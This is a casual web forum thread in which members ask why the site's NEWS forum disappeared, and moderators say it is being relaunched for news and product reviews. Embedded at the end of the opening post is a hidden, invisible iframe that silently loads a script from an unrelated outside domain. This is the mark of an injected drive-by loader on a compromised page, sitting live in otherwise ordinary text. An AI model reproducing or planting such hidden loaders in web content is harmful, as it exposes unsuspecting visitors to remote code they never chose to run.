+ Reply to Thread
    Mod-Blog's SmartPhone Correspondent

Okay, I'll bite - NEWS?

Okay, I was waiting for an announcement, but I guess I'll be the brave soul to raise his hand. :clap

Was the "NEWS" forum removed from the site, or is there something up with my Browser that it can no longer see it? Not a big deal - it is somewhat redundant between the GENERAL DISCUSSION and News/Announcements folders. But I was curious. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Okay, I'll bite - NEWS?

Originally posted by nomad7674
    Okay, I was waiting for an announcement, but I guess I'll be the brave soul to raise his hand. :clap

Was the "NEWS" forum removed from the site, or is there something up with my Browser that it can no longer see it? Not a big deal - it is somewhat redundant between the GENERAL DISCUSSION and News/Announcements folders. But I was curious.
    I noticed it too, but thought I was just having one of my "senior moments". When you are turning 60 and suffer from "Seasonal Affect Disorder" these senior moments come with increasing regularity.
    Dave

I'm not sure what happened, but I know that JJ and jazz are doing some work on it. It was originally intended for site news and big annoucements... but was mostly getting off-topic posts to it. So I think it'll be back soon in a different format.

Stay tuned!
    Please visit my picture site: Robert-O-Rama :)

Oops... guess I forgot to post an announcement about that! Yes, it did dissappear, but only for a short while.... It is a place where we'd like to post "exciting" news, product reviews, and such that we like to have on the homepage. We weren't fond of all the off topic posts that members were putting in there, so we're relaunching the forum with a new style.....
    So, those of you who like to write reviews and such, stay tuned... we'll have more details shortly....
    --Jazz--

Originally posted by jazz
    Oops... guess I forgot to post an announcement about that! Yes, it did dissappear, but only for a short while.... It is a place where we'd like to post "exciting" news, product reviews, and such that we like to have on the homepage. We weren't fond of all the off topic posts that members were putting in there, so we're relaunching the forum with a new style.....
    So, those of you who like to write reviews and such, stay tuned... we'll have more details shortly....
    Sounds great jazz! As usual you da woman! :clap
    Please visit my picture site: Robert-O-Rama :)

Mod-Blog's SmartPhone Correspondent
    Welcome back, News Section. We missed you so... <Sniff>

Originally posted by nomad7674
    Welcome back, News Section. We missed you so... <Sniff>
    And here I thought it was just a case of dementia. Guess I can't move into assisted living quite yet...
    Dave